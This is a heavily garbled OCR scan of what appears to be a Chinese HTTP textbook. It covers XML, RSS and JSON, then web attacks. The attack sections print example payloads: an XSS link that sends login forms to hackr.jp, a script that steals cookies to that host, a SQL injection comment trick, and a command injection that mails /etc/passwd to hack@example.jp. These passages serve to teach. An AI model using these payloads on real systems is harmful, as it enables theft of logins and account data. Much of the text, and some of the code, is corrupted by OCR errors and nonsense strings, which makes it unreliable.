接 看 将 这 份 列表 以 XML 的 形式 改 号 就 成 了 以 下 的 示例 。 











< 研讨 会 编号 ="TR001" 主题 ="Web 应 用 程序 脆弱 性 诊断 讲座 "> 
= 
< 概要 > 为 深入 研究 Web 应 用 程序 脆弱 性 诊断 必要 的 …</ 概要 > 

< 研讨 会 > 

< 研讨 会 编号 ="TR002" 主题 =" 网 络 系统 脆弱 性 诊断 讲座 "> 
> 
< 概要 > 为 深入 研究 网 络 系统 脆弱 性 诊断 必要 的 …</ 概要 > 

</ 研讨 会 > 


XML 和 HTML 一 样 ， 使 用 标签 构成 树 形 结构 ， 并 且 可 目 定 义 扩 展 


从 XML 文档 中 读 取 数据 比 起 HTML 更 为 简单 。 由 于 XML 的 结构 
基本 上 都 是 用 标签 分 割 而 成 的 树 形 结构 ， 因 此 通过 语法 分 析 器 〈 Parser ) 
的 解析 功能 解析 XML 结构 并 取出 数据 元 素 ， 可 更 容易 地 对 数据 进行 
读 取 。 

更 容易 地 复 用 数据 使 得 XML 在 互联 网 上 被 广泛 接受 。 比 如 ， 可 用 
在 2 个 不 同 的 应 用 之 间 的 交换 数据 格式 化 。 


10.4.2 发布 更 新 信息 的 RSS/Atom 

RSS ( 简易 信息 聚合 ， 也 叫 聚 合 内 容 ) 和 Atom 都 是 发 布 新 闻 或 博 
客 日 志 等 更 新 信息 文档 的 格式 的 总 称 。 两 者 都 用 到 了 XML。 

RSS 有 以 下 版 本 ， 名 称 和 编写 方式 也 不 相同 。 














RSS 0.9 ( RDF Site Summary ) : 最 初 的 RSS 版 本 。1999 年 3 月 
由 网 景 通信 公司 自行 开发 用 于 其 门户 网 站 。 基 础 构图 创建 在 初期 的 
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RDF 规格 上 。 

RSS 0.91 ( Rich Site Summary ) : 在 RSS0.9 的 基础 上 扩展 元 素 ， 
于 1999 年 7 月 开发 完毕 。 非 RDF 规格 ,使 用 XML 方式 编写 。 
RSS 1.0 ( RDF Site Summary ) : RSS 规格 正 处 于 混乱 状态 。2000 
年 12 月 由 RSS-DEV 工作 组 再 次 采用 RSS0.9 中 使 用 的 RDF 规格 
发 布 。 

RSS2.0 ( Really Simple Syndication ) : 非 RSS1.0 发 展 路 线 。 增 加 
支持 RSS0.91 的 兼容 性 ，2000 年 12 月 由 UserLand Software 公司 开 
Atom 具有 以 下 两 种 标准 。 

Atom 供稿 格式 ( Atom Syndication Format ) : 为 发 布 内 容 而 制定 
的 网 站 消息 来 源 格式 ， 单 讲 Atom 时 ， 就 是 指 此 标准 。 

Atom 出 版 协定 ( Atom Publishing Protocol ) : 为 Web 上 内 容 的 新 
增 或 修改 而 制定 的 协议 。 
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用 于 订阅 博客 更 新 信息 的 RSS 阅读 器 ， 这 种 应 用 几乎 支持 RSS 的 
所 有 版 本 以 及 Atom 。 
下 面 是 RSS1.0 的 示例 。 





< Vearglons=Hi, OW enaodolmnee uv = OS 

<?xml -stylesheet href="http://d.hatena.ne.jp/sen-u/rssxsl" type= 一 
aesasy/sas me Venema 

Gl 3 (RD 

sqm lass=u ne /aurl , ee/ ea/ 1 ,0 
xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" 
SEE 和 
cml le eer EL LEERES yA 

San liane = a> 

<channel rdf:about="http://d.hatena.ne.jp/sen-u/rss"> 
ele 7 
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<link>http://d.hatena.ne.jp/sen-u/</link> 
<descript ion RT /ooriotions 


</ haemaels 


<item rdf:about="http://d.hatena.ne.jp/sen-u/20121215/pl"> 
<title> [security] 提供 脆弱 性 悬赏 奖金 计划 的 网 站 一 览 < 人 title> 
<link>http://d.hatena.ne.jp/sen-u/20121215/p1l</link> 
<description> 正 是 所 谓 “ 是 所 谓 Bounty Programs 、 一 

处 理 接受 Web 胞 弱 性 的 相关 信息 ， 并 提供 奖金 的 计划 . . .</description> 
= Sm Ul en 

ler ae oO 2 /oer aes 
<dc:subject>security</dc:subject> 


</item> 


10.4.3 ”JavaScript 衍生 的 轻 量 级 易 用 JSON 

JSON ( JavaScript Object Notation ) 是 一 种 以 JavaScript ( ECMAScript ) 

206 ”的 对 象 表示 法 为 基础 的 轻 量 级 数据 标记 语言 。 能 够 处 理 的 数据 类 型 有 
false/nulltrue/ 对 象 /数组 /数字 /字符 串 ， 这 7 种 类 型 。 














(luname wep applieation Seeuriey NORR0O0L | 


JSON 让 数据 更 轻 更 纯粹 ， 并 且 JSON 的 字符 串 形式 可 被 JavaScript 
轻易 地 读 和 人 人。 当初 配合 XML 使 用 的 Ajax 技术 也 让 JSON 的 应 用 变 得 更 
为 广泛 。 另 外 ， 其 他 各 种 编程 语言 也 提供 丰富 的 库 类 ， 以 达到 轻便 操作 
JSON 的 目的 。 

有 关 JSON 更 为 翔实 的 内 容 请 参考 RFC4627“The application/json 
Media Type for JavaScript Object Notation (JSON) 
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第 11 章 
Web 的 攻击 技术 


互联 网 上 的 攻击 大 都 将 Web 站 操作 为 目标 。 本 草 讲 解 具 体 有 了 哪些 
攻击 Web 站 点 的 手段 ， 以 及 攻击 会 造成 怎样 的 影响 。 
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11.1 针对 Web 的 攻击 技术 


简单 的 HITP 协议 本 号 并 不 存在 安全 性 问题 ， 因 此 协议 本 号 几乎 不 
会 成 为 攻击 的 对 象 。 应 用 HTTP 协议 的 服务 硕 和 客户 端 ， 以 及 运行 在 服 
务 表 上 的 Web 应 用 等 催 源 才 是 攻击 目标 。 

目前 ， 来 自 互 联网 的 攻击 大 多 是 冲 者 Web 站 点 来 的 ， 它 们 大 多 把 
Web 应 用 作为 攻击 目标 。 本 章 主要 针对 Web 应 用 的 攻击 技术 进行 讲解 。 
Exim 2% 


ProFTPD 
3% 








互联 网 上 重要 攻击 事件 明细 
参见 : LAC JSOC 株 式 会 社 的 入 侵 分 析 倾 向 报告 Vol.18 (2012 年 4 月 26 日) 


图 : 攻击 事件 倾向 


11.1.1 HTTP 不 具备 必要 的 安全 功能 

与 最 初 的 设计 相 比 ， 现 今 的 Web 网 站 应 用 的 HTTP 协议 的 使 用 方 
式 已 发 生 了 翻天 履 地 的 变化 。 几 乎 现今 所 有 的 Web 网 站 都 会 使 用 会 话 
( session ) 管理 、 加 蜜 处 理 等 安全 性 方面 的 功能 ， 而 HITP 协议 内 并 不 
具备 这 些 功 能 

从 整体 上 看 ，HTTP 就 是 一 个 通用 的 单纯 协议 机 制 。 因 此 它 具备 较 
多 优势 ， 但 是 在 安全 性 方面 则 呈 和 劣势 。 

就 拿 远 程 登录 时 会 用 到 的 SSH 协议 来 说 ，SSH 具备 协议 级 别 的 认 
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证 及 会 话 管理 等 功能 ，HTITP 协议 则 没有 。 男 外 在 架设 SSH 服务 方面 ， 
任何 人 都 可 以 轻易 地 创建 安全 等 级 高 的 服务 ， 而 HITP 即使 已 染 设 好 服 
务 人 项， 但 在 想 提供 服务 人 硕 基 础 上 的 Web 应 用 ， 很 多 情况 下 都 需要 重新 
开发 。 

因此 ， 开 发 者 需要 日 行 设计 并 开发 认证 及 会 话 管 理 功能 来 满足 Web 
应 用 的 安全 。 而 自行 设计 就 意味 春 会 出 现 各 种 形形色色 的 实现 。 绪 采 ， 
安全 等 级 并 不 完备 ， 可 仍 在 运作 的 Web 应 用 背后 却 隐藏 着 各 种 容易 被 
攻击 者 小 用 的 安全 漏洞 的 Bug。 


11.1.2 ”在 客户 端 即 可 算 改 请 求 

在 Web 应 用 中 ， 从 浏览 套 那 接收 到 的 HTTP 请 求 的 全 部 内 容 ， 都 
可 以 在 客户 端 目 由 地 变更 、 算 改 。 所 以 Web 应 用 可 能 会 接收 到 与 预期 
数据 不 相同 的 内 容 。 

在 HTTP 请 求 报 文 内 加 载 攻 击 人 代码， 就 能 发 起 对 Web 应 用 的 攻击 。 
通过 URL 查询 字段 或 表单 、HTTP 首部 、Cookie 等 途径 把 攻击 代码 传 
和 ,在 这 时 Web 应 用 存在 安全 漏洞 ， 那 内 部 信息 就 会 遭 到 禄 取 ， 或 被 
攻击 者 拿 到 管理 权限 。 










































存在 安全 漏洞 的 Web 应 用 














攻击 者 





通过 URL 查询 字段 或 表单 、HTTP 首 
部 、Cookie 等 途径 把 攻击 代码 传 入 


- 对 Web 应 用 的 攻击 
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11.1.3 ”针对 Web 应 用 的 攻击 模式 
对 Web 应 用 的 攻击 模式 有 以 下 两 种 。 


e 主动 攻击 
e@ 被 动 攻击 


国 以 服务 希 为 目标 的 主动 攻击 

主动 攻击 ( active attack ) 是 指 攻击 者 通过 直接 访问 Web 应 用 ， 把 
攻击 代码 传人 的 攻击 模式 。 由 于 该 模式 是 二 接 针对 服务 从 上 的 欣 源 进行 
攻击 ， 因 此 攻击 者 需要 能 够 访问 到 那些 资源 。 

主动 攻击 模式 里 具有 代表 性 的 攻击 是 SQL 注入 攻击 和 OS 命令 注入 
攻击 。 














主要 攻击 服务 器 上 的 资源 











中 执行 攻击 代码 











(信息 泄露 . 


执行 命令 人 





攻击 者 


ja 


图 : 主动 攻击 


图 以 服务 颖 为 目标 的 被 动 攻击 
被 动 攻击 〈passive attack ) 是 指 利 用 圈套 策略 执行 攻击 代码 的 攻击 梗 
式 。 在 被 动 攻击 过 程 中 ， 攻 击 者 不 直接 对 目标 Web 应 用 访问 发 起 攻击 。 
被 动 攻 击 通 第 的 攻击 模式 如 下 所 示 。 
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攻击 者 诱 使 用 户 触发 已 设置 好 的 陷阱 ， 而 陷阱 会 启动 发 送 
已 移入 攻击 代码 的 HTTP 请 求 。 

当 用 户 不 知 不 觉 中 招 之 后 ， 用 户 的 浏览 占 或 邮件 客户 端 就 
会 触发 这 个 陷阱 。 

中 招 后 的 用 户 浏览 器 会 把 含有 攻击 代码 的 HITP 请 求 发 送 
给 作为 攻击 目标 的 Web 应 用 ， 运 行 攻 击 代 码 。 

执行 完 攻 击 代 人 码 ， 存 在 安全 漏洞 的 Web 应 用 会 成 为 攻击 
者 的 跳板 ， 可 能 导致 用 户 所 持 的 Cookie 等 个 人 信息 被 千 
取 ， 登 录 状 态 中 的 用 户 权 限 遭 恶意 滥用 等 后 果 。 

被 动 攻 击 模 式 中 具有 代表 性 的 攻击 是 跨 站 脚本 攻击 和 跨 立 
点 请 求 伪 造 。 


























主要 攻击 用 户 的 资源 和 权限 | 








限 遭 恶意 小 人 


CO 用户 的 浏览 器 触发 事先 已 设 好 


来 
中 陷阱 诱导 > 避 


(4) 执 行 攻击 代码 的 后 果 是 用 户 所 
持 的 Cookie 等 被 窃取 、 用 户 权 


EE 
Mia Oi 一 一 一 一 Fee FG 
2 本 CE 

















(3) 用 户 的 浏览 器 运行 攻击 代码 








在 Web 页 面 或 邮件 内 
设置 陷阱 





陷阱 的 HTTP 请 求 





图 : 被 动 攻击 


利用 用 户 的 身份 攻击 企业 内 部 网 络 


利用 被 动 攻 击 ， 可 发 起 对 原本 从 互联 网 上 无 法 下 接 访 问 的 企业 内 网 


等 网 络 的 攻击 。 只 要 用 户 蹄 入 攻击 者 预 完 设 好 的 陷阱 ， 在 用 户 能 够 访问 
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到 的 网 络 范围 内 ， 即 使 是 企业 内 网 也 同样 会 受到 攻击 。 

很 多 企业 内 网 依然 可 以 连接 到 互联 网 上 ， 访 问 Web 网 站 ， 或 接收 互 
联网 发 来 的 邮件 。 这 样 就 可 能 给 攻击 者 以 可 乘 之 机 ， 放 导 用 户 触 发 陷阱 
后 对 企业 内 网 发 动 攻击 。 


利用 用 户 身 份 的 攻击 | 


企业 内 网 用 户 的 浏览 器 运行 EPE 


局 


(用 户 的 浏览 器 触发 事先 已 设 好 陷阱 的 


























HTTP 请 求 
二 
互联 网 
> 
一 | 
机 陷 阶 衣 导 [> 企业 内 网 的 Web 服 务 器 


: 利用 被 动 攻击 对 企业 内 网 发 动 攻击 


11.2 ” 因 输 出 值 转 义 不 完全 引发 的 安全 漏洞 
实施 Web 应 用 的 安全 对 策 可 大 人 致 分 为 以 下 两 部 分 。 


e 客户 端的 验证 

e Web 应 用 端 ( 服务 器 端 ) 的 验证 
0 输入 值 验证 
o 输出 值 转 义 
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HTTP 响应 


Eee 
=—=> 答 访问 DB 
= 
HTTP 请 求 、、 、 
访问 文件 
IE 


客户 新 的 验证 Web 应 用 端的 验证 











图 : 验证 数据 的 几 个 地 方 





多 数 情况 下 采用 JavaScript 在 客户 端 验 证 数据 。 可 是 在 客户 端 允 许 
算 改 数据 或 关闭 JavaScript， 不 适合 将 JavaScript 验证 作为 安全 的 防范 对 
策 。 保 留 客户 端 验证 只 是 为 了 尽早 地 辨识 输入 错误 ， 起 到 提高 UI 体验 
的 作用 。 

Web 应 用 端的 输入 值 验证 按 Web 应 用 内 的 处 理 则 有 可 能 被 误 认 为 
是 具有 攻击 性 意义 的 代码 。 输 入 值 验证 通常 是 指 检查 是 否 是 符合 系统 业 
务 逻 辑 的 数值 或 检查 字符 编码 等 预防 对 策 。 

从 数据 库 或 文件 系统 、HIML 、 邮 件 等 输出 Web 应 用 处 理 的 数据 之 
际 ， 针 对 输出 做 值 转 义 处 理 是 一 项 至 关 重 要 的 安全 策略 。 当 输出 值 转 义 
不 完全 时 ， 会 因 触 发 攻击 者 传人 的 攻击 代码 ， 而 给 输出 对 象 市 来 损害 。 


11.2.1 跨 站 脚本 攻击 

路 站 脚本 攻击 ( Cross-Site Scripting，XSS ) 是 指 通过 存在 安全 漏洞 
的 Web 网 站 注册 用 户 的 浏览 硕 内 运行 非法 的 HIML 标签 或 JavaScript 
进行 的 一 种 攻击 。 动 态 创建 的 HTML 部 分 有 可 能 隐藏 着 安全 漏洞 。 就 
这 样 ， 攻击 者 编写 脚本 设 下 隐 阱 ， 用 户 在 目 己 的 浏览 各 上 运行 时 ， 一 不 
小 心 就 会 受到 被 动 攻 击 。 

路 站 脚本 攻击 有 可 能 造成 以 下 影 啊 。 



































e 利用 虚假 输入 表单 骗取 用 户 个 人 信息 。 
e 利用 脚本 窃取 用 户 的 Cookie 值 ， 被 害 者 在 不 知情 的 情况 下 ， 帮 助 
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攻击 者 发 送 恶意 请 求 。 
e 显示 伪造 的 文章 或 图 片 。 


国 跨 站 脚本 攻击 案例 
在 动态 生成 HTML 处 发 生 

下 面 以 编辑 个 人 信息 页 面 为 例 讲解 跨 站 脚本 攻击 。 下 方 界 面 显示 了 
用 户 输入 的 个 人 信息 内 容 。 





E33 | | 
和 和 中 全 局 和 和 中 全 S 


姓名 姓名 ”山口 一 郎 
邮箱 地 址 邮箱 地 址 yama@example.com 
自我 介绍 | 你 好 | 。 和 我 介绍 ty 


确认 修改 保存 修改 
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动态 生成 HTML 处 有 可 能 隐 含 安全 漏洞 


: 解 跨 站 脚本 攻击 案例 





确认 界面 按 原 样 显 示 在 编辑 界面 输入 的 字符 串 。 此 处 输入 带 有 山口 
一 郎 这 样 的 HTML 标签 的 字符 串 。 


输入 HTML 标签 <s> 山口 一 郎 </s> 经 浏览 器 解析 
标签 局 后 显示 删除 线 


编辑 个 人 信息 编辑 个 人 信息 
姓名 姓名 -tH 一 部 


邮箱 地 址 邮箱 地 址 yama@example.com 
自我 介绍 自我 介绍 “你 好 | 


确认 修改 保存 修改 





: 按照 输入 内 容 原样 显示 的 机 制 
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此 时 的 确认 界面 上 ， 浏 览 硕 会 把 用 户 输入 的 <s> 解析 成 HIML 标 
签 ， 然 后 显示 删除 线 。 

删除 线 显示 出 来 并 不 会 造成 太 大 的 不 利 后 果 ， 但 如 采 换 成 使 用 
script 标签 将 会 如 何 呢 。 


XSS 是 攻击 者 利用 预先 设置 的 陷阱 触发 的 被 动 攻击 

跨 站 脚本 攻击 属于 被 动 攻击 模式 ， 因 此 攻击 者 会 事先 布置 好 用 于 攻 
击 的 陷阱 。 

下 图 网 站 通过 地 址 栏 中 URI 的 查询 字段 指定 ID ， 即 相当 于 在 表单 
内 自动 填写 字符 串 的 功能 。 而 就 在 这 个 地 方 ， 隐 藏 着 可 执行 跨 站 脚本 攻 
击 的 漏洞 。 











http://example.jp/login?ID=yama 








充分 熟知 此 处 漏洞 特点 的 攻击 者 ， 于 是 就 创建 了 下 面 这 段 航 入 恶意 
RE 
使 用 户 去 点 击 该 URL。 





http://example.jp/1Login?ID="><Sctript>var+Ef=document 一 
.getElLementById ("Login") ;+f.action="http://hackr.jp/pwget";+f .method=SO 
"get";</script><span+s=" 


浏览 硕 打 开 该 URI 后， 和 直观 感觉 没 有 发 生 任何 变化 ， 但 设置 好 的 
脚本 却 偷偷 开始 运行 了。 当 用 户 在 表单 内 输入 ID 和 密码 之 后 ， 就 会 下 
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er 


接 发 送 到 攻击 者 的 网 站 ( 也 就 是 hackr.jp )， 导 致 个 人 登录 信息 被 田 取 。 


http:/example.jp/login?lD="><scr... 
















a 3 肢 
本 导 运 


和 加 人 淖 http:/.... i 


EL 折 区 会 
D [yama 


PW 











表单 填写 完毕 后 就 直 
接 把 1D 及 密 码 发 送 到 


攻击 者 的 网 站 登录 





之 后 ,ID 及 密码 会 传 给 该 正规 网 站 ， 而 接 下 来 仍然 是 按 正常 登录 
步 又， 用 户 很 难 意识 到 自己 的 登录 信息 已 遭 浊 露 





对 http://example.jp/login?ID=yama 请 求 时 对 应 的 HTML 源 代码 ( 摘录 ) 


<elv elases lo 
216 <img src="/img/logo.gif" alt="E! 拍卖 会 " /> 
</div> 
<torm action=unCep//example I/ logm meehod "Dose 10 "ognin"> 
En 
ID <input type="text" name="ID" value="yama" /> 


</ LVS 


http://example.jp/login?ID="><script>var+f=document .getElementById 
("login") ;+f.action="http://hackr.jp/pwget";+f.method="get";</script> 
<span+s=" 对 请 求 时 对 应 的 HTML 源 代码 ( 摘录 ) 


< eass eeu 

<img src="/img/logo.9gif" alt="E! 拍卖 会 
</ CLV 
Sionmeaetlen ee /eam lo mn Vos gd en 
= elass Va > 

ID <input type="text" name="ID" value=""><script>var f=document > 
.getElementById("login"); f.action="http://hackr.jp/pwget"; f.method=SO 
"get";</script><span s="" /> 


</div> 
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国 对 用 户 Cookie 的 窃取 攻击 
除了 在 表单 中 设 下 圈套 之 外 ， 下 面 那 种 恶意 构造 的 脚本 同样 能 够 以 
跨 站 脚本 攻击 的 方式 ， 急 取 到 用 户 的 Cookie 信息 。 











senabele ne e/a a se 


该 脚本 内 指定 的 http://hackr.jp/xss.js 文件 。 即 下 面 这 上 段 采 用 
JavaScript 编写 的 代码 。 


var content = escape (document .CooKkie) ; 
doenmene el me se Met yA 人 于 
document .write (content).， 


oecvumenme eel 下 


在 存在 可 蜂 站 脚本 攻击 安全 漏洞 的 web 应 用 上 执行 这 上段 
JavaScript 程序 ， 即 可 访问 到 该 Web 应 用 所 处 域名 下 的 Cookie po 时 。 然 
后 这 些 信 息 会 发 送 至 攻击 者 的 Web 网 站 ( http://hackrjp/ )， 记 录 在 他 的 
登录 日 志 中 。 结 果 ， 攻 击 者 就 这 样 历 取 到 用 户 的 Cookie 信息 了 











http://example.jp/login?lD="><script 
src=http://hackr.jp/xss.Js></script>" 


览 该 Web 网 站 的 用 户 
Cookie 就 会 被 窃取 





图 : 使 用 XSS 攻击 夺取 Cookie 信息 
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11.2.2 ”SQL 注入 攻击 


国会 执行 非法 SQL 的 SQL 注入 攻击 

SQL 注入 (SQL Injection ) 是 指针 对 Web 应 用 使 用 的 数据 库 ， 通 过 
运行 非法 的 SQL 而 产生 的 攻击 。 该 安全 隐患 有 可 能 引发 极 大 的 威胁 ， 
有 时 会 直接 导致 个 人 信息 及 机 密 信息 的 泄露 。 

Web 应 用 通 帝 都 会 用 到 数据 库 ， 当 需要 对 数据 库 表 内 的 数据 进行 检 
索 或 添加 、 删 除 等 操作 时 ， 会 使 用 SQL 语句 连接 数据 库 进 行 特定 的 操 
作 。 如 果 在 调用 SQL 语句 的 方式 上 存在 下 漏 ， 就 有 可 能 执行 被 恶意 注 
入 (Injection ) 非法 SQL 语句 。 

SQL 注入 攻击 有 可 能 会 造成 以 下 等 影响 。 











e@ 韭 法 查看 或 算 改 数据 库 内 的 数据 
@ 规避 认证 
e@ 执行 和 数据 库 服务 器 业务 关联 的 程序 等 


何 为 SQL 

SQL 是 用 来 操作 关系 型 数据 库 管 理 系统 (Relational DataBase 
Management System，RDBMS ) 的 数据 库 语言 ， 可 进行 操作 数据 或 定义 
数据 等 。RDBMS 中 有 名 的 数据 库 有 Oracle Database、Microsoft SQL 
Server、IBM DB2、MySQL 和 PostgreSQL 等 。 这 些 数 据 库 系统 都 可 以 
把 SQL 作为 数据 库 语 言 使 用 。 

使 用 数据 库 的 Web 应 用 ， 通 过 菏 种 方法 将 SQL 语句 传 给 RDBMS， 
再 把 RDBMS 返回 的 结果 灵活 地 使 用 在 Web 应 用 中 。 


e SQL 语句 示例 


SE RM nv Sn 光志 
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国 SQL 注入 攻击 案例 

下 面 以 某 个 购物 网 站 的 搜索 功能 为 例 ， 讲解 SQL 注入 攻击 。 通 过 
该 功能 ， 我 们 可 以 将 某 作者 的 名 字 作为 搜索 关键 字 ， 查 找 该 作者 的 所 有 
著作 。 





[| 
各 a 便 http://… 
BOQGISSTORE 


作者 " 上野 宣 "的 搜索 结果 
指定 作者 为 搜索 
关键 字 显 朱 其 车 


12/06/19 繁杂 的 Web 安 …… 作 一 览 
05/06/17 宣 今 晚 我 们 一 起 学 习 邮 件 协 ……: 

04/12/09 仿 % 牧 们 二 下 TP x 不 显示 已 绝版 的 
04/12/09 今 晚 我 们 一 起 学 习 TCP/IP 书籍 
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: SQL 注入 攻击 案例 


正常 处 理 的 操作 示例 
下 网 是 将 “上 野 宣 ”作为 关键 字 的 搜索 结 朱 。 










Es 到 | 
名 > 便 http://…. [ 
BOOKSTORE 


作者 ”上 时 时 的 搜索 结 困 人 http:/example.com/search?q= 上野 宣 


12/06/19 上 野 宣 繁杂 的 Web 安 …… 





















【 SOL 语句 】 
SELECT * FROM bookTbl WHERE author = ' 上野 宣 ' and flag = 1; 





从 bookTbl 表 中 ， 显 示 满 足 author= 上 野 宣 and flag=1( 可 售 ) 所 在 行 的 数据 





: 正常 处 理 操作 的 示例 
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URL 的 查询 字段 已 指定 q= 上 野 宣 ， 这 个 值 由 Web 应 用 传人 到 
SQL 语句 中 ， 构 成 下 方 的 SQL 语句 。 


SELECT * FROM bookTbl] WHERE author = '! 上 野 宣 ', and flag = 1; 


该 SQL 语句 表示 “从 bookTbl 表 中 ， 显 示 满 足 author= 上 野 宣 and 
flag=1(〈 可 售 ) 所 在 行 的 数据 ”。 

数据 库 内 的 bookTbl 表 记 录 着 该 购物 网 站 的 所 有 书籍 信息 。 通 过 
SQL 语句 ， 将 满足 作者 名 ( author ) 上 野 宣 并 是 flag 为 1 双重 条 件 的 条 
目 取出 ， 最 后 作为 搜索 结果 显示 出 来 。 





book [bl 

bd dae |author ltte lfeg 
1000203503 12/06/2023 ”新井 悠 ”Bug 猎人 日 记 1 
; 1000203501 ”12/06/2019 。” 上野 宣 ”繁杂 的 Web 安 全 性 1 
“1000103409 ”10/06/2002 ”明智 光秀 本 能 寺 之 变 | 
; 1000093050 ”05/06/2017 ” 上 野 宣 。” 今 晚 我 们 一 起 学 习 邮 件 协 议 1 ， 
.1000085771 04/12/2009 上野 宣 。 今 晚 我 们 一 起 学 习 HTIP 1 
: 1000072889 ”04/12/2009 上野 宣 今 晚 我 们 一 起 学 习 TCPAP I 
1000042384 03/04/2021 上 野 宣 新手 必 备 TCP/IP 入 门 0 





从 bookTbl 表 内 显示 满足 “author= 上野 宣 ” 且 “flag=1"” 条 件 的 所 在 行 数据 
*"flag=0” 代表 绝版 的 书籍 








: 数据 库 处 理 


SQL 注入 攻击 的 操作 示例 
把 刚才 指定 查询 字段 的 上 时 定 改 写成 “上 野 宣 -- 。 
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[| 
得 E33 便 http://.... We 
BOOQKSTORE 


作者 [时 时 的 搜索 结 困 | http://example.com/search?q= 上野 宣 ' -- 


12/06/19 上 时 宣 繁杂 的 Web 安 …… 

05/06/17 ”上野 宣 今 晚 我 们 一 起 学 习 邮 件 协 …… 

04/12/09 上野 宣 今 晚 我 们 一 起 学 习 HTTP 

0Q4/12709 NE “| 人 虹 我 们 3 学 TCP/IR 

03/04/21 上 瞄 “、 新 手 必 备 TCP/IP 入 门 

(SO 

SEBECT™ EROMEBooMo NNERE author = ETE andleog 1 








从 bookTbl 表 内 显示 满足 “author= 上野 宣 ” 这 个 条 件 的 所 在 行 数据 
( -- 之 后 的 内 容 会 自动 判 为 注释 ， 因 此 flag=1 这 个 条 件 就 被 直接 忽略 了 ) 








: SQL 注入 攻击 的 操作 示例 
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构成 的 SQL 语句 就 变 成 “从 数据 库 的 bookTbl 表 中 ， 显 示 满 足 
author= 上 时 宣 条 件 所 在 行 的 数据 *”， 如 下 所 示 。 


SELECT * FROM bookTbl] WHERE author ='! 上野 宣 '--' and flag=1; 


SQL 语句 中 的 -- 之 后 全 视 为 注释 。 即 ，and flag=1 这 个 条 件 被 自动 
忽略 了 。 
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ao 


book bl 


bd dete |auor |ite ”fog 








， 10002035010912108/2019 叶 对 和 不 的 WeD 志 全 | 生 1 





: 1000093050 ”05/06/2017 ”上野 宣 。 今 晚 我 们 一 起 学 习 邮 件 协议 由 





: 1000072889 04/12/2009 上野 宣 今 晚 我 们 一 起 学 习 TCP/IP 1 








从 bookTbl 表 内 显示 满足 "author= 上 野 宣 "这 个 条 件 的 所 在 行 数据 
( flag 这 个 筛选 条 件 因 SQL 注 入 变 成 无 效 的 了 ) 





图 : 数据 库 处 理 


结果 跟 flag 的 设 定 值 无 天 ， 只 取出 满足 author=“ 上 野 宣 ”条 件 所 在 
人 4 行 的 数据 ， 这 样 连 那些 尚未 出 版 的 书籍 也 一 并 显示 出 来 了 。 







BOOKSTORE 


“121082019 上 时 二 委 的 We 


05/06/2017 上野 宣 ” 今 晚 我 们 一 起 学 习 邮件 协 …… 

















04/12/120099 上 广 税 定 和 | 今 蜡 我 们 想 学 可 TCPAR 


原本 不 该 显示 
的 绝版 的 数据 
却 显 示 了 





: 被 SQL 注入 的 后 果 


国 SQL 注入 攻击 破坏 SQL 语句 结构 的 案例 
SQL 注入 是 攻击 者 将 SQL 语句 改变 成 开发 者 意 想 不 到 的 形式 以 达 
到 破坏 结构 的 攻击 。 
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比如 ， 在 之 前 的 攻击 案例 中 ， 就 会 把 author 的 字面 值 (程序 中 使 用 
的 稼 量 ) " 上 野 宣 '--" 的 字符 串 赋值 给 $q。 


SELECT * FROM bookTb1l WHERE author = '$q' and flag = 1; 








SELECT * FROM bookThbl WHERE author = ' == no flag = 1) 


author 的 字面 值 溢 出 


图 : SQL 注入 攻击 的 原理 





上 图 中 颜色 标记 的 字符 串 最 开始 的 单 引 号 () 表示 会 将 author 的 字 
面值 括 起 来 ， 以 到 达 第 二 个 单 引号 后 作为 结束 。 因 此 ，author 的 字面 值 
就 成 了 了 上野 宣 ， 而 后 面 的 -- 则 不 再 属于 author 字 面值 ， 会 被 解析 成 其 
他 的 句法 。 

本 案例 中 的 问题 仅仅 是 把 未 出 版 书籍 的 条 目 也 一 同 显示 出 来 了 。 但 
实际 发 生 SQL 注入 攻击 时 ， 很 有 可 能 会 导致 用 户 信息 或 结算 内 容 等 其 
他 数据 表 的 非法 浏览 及 算 改 ， 从 而 使 用 户 遭 受 不 同 程度 的 损失 。 


11.2.3 ”OS 命令 注入 攻击 

OS 命令 注入 攻击 (OS Command Injection ) 是 指 通过 Web 应 用 ， 
执行 非法 的 操作 系统 命令 达到 攻击 的 目的 。 只 要 在 能 调用 Shell 函数 的 
地 方 就 有 存在 被 攻击 的 风险 。 

可 以 从 Web 应 用 中 通过 Shell 来 调用 操作 系统 命令 。 倘 奇 调用 Shell 
时 存在 玻 漏 ， 就 可 以 执行 搬入 的 非法 OS 命令 。 

OS 命令 注入 攻击 可 以 向 Shell 发 送 命令 ， 让 Windows 或 Linux 操 
作 系 统 的 命令 行 启动 程序 。 也 就 是 说 ， 通 过 OS 注入 攻击 可 执行 OS 上 
安装 着 的 各 种 程序 。 
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国 OS 注入 攻击 案例 
下 面 以 咨询 表单 的 发 送 功能 为 例 ， 讲 解 OS 注入 攻击 。 该 功能 可 将 
用 户 的 咨询 邮件 按 已 填写 的 对 方 邮 箱 地 址 发 送 过 去 。 





请 在 下 方 表单 内 输入 内 容 后 发 送 


邮件 地 址 | | 


国有 


i 





: OS 注入 攻击 的 攻击 案例 


224 下 面 摘 选 处 理 该 表单 内 容 的 一 部 分 核心 代码 。 


my Sadr = S$q->param('mailaddress'); 
open(MAID "I /usr/sbin/sendmalil Sadr"); 


print MAIL "From: info@examplée.com\n"; 


程序 中 的 open 图 数 会 调用 sendmail 命令 发 送 邮 件 ， 而 指定 的 邮件 
发 送 地 址 即 $adr 的 值 。 
攻击 者 将 下 面 的 值 指定 作为 邮件 地 址 。 





; Cat /etc/passwd | mail hack@example.jp 


程序 接收 该 值 ， 构 成 以 下 的 命令 组 合 。 


| /usr/sbin/sendmail ; cat /etc/passwd | mail hack@example.jp 
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攻击 者 的 输入 值 中 含有 分 号 (; )。 这 个 符号 在 OS 命令 中 ， 会 被 解 
析 为 分 阳 多 个 执行 命令 的 标记 。 

可 见 ，sendmail 命令 执行 被 分 隔 后 ， 接 下 去 就 会 执行 cat /etc/passwd 
| mail hack@example.jp 这 样 的 命令 了 。 结 果 ， 含 有 Linux 账户 信息 /etc/ 
passwd 的 文件 ， 就 以 邮件 形式 发 送 给 了 hack@example.jp。 


11.2.4 HTTP 首部 注入 攻击 

HTTP 首部 注入 攻击 (HITP Header Injection ) 是 指 攻击 者 通过 在 
呵 应 首部 字段 内 插入 换行 ， 添加 任意 啊 应 首部 或 主体 的 一 种 攻击 。 属 于 
被 动 攻击 模式 。 

回首 部 主体 内 添加 内 容 的 攻击 称 为 HITP 啊 应 截断 攻击 (HTTP 
Response Splitting Attack )。 

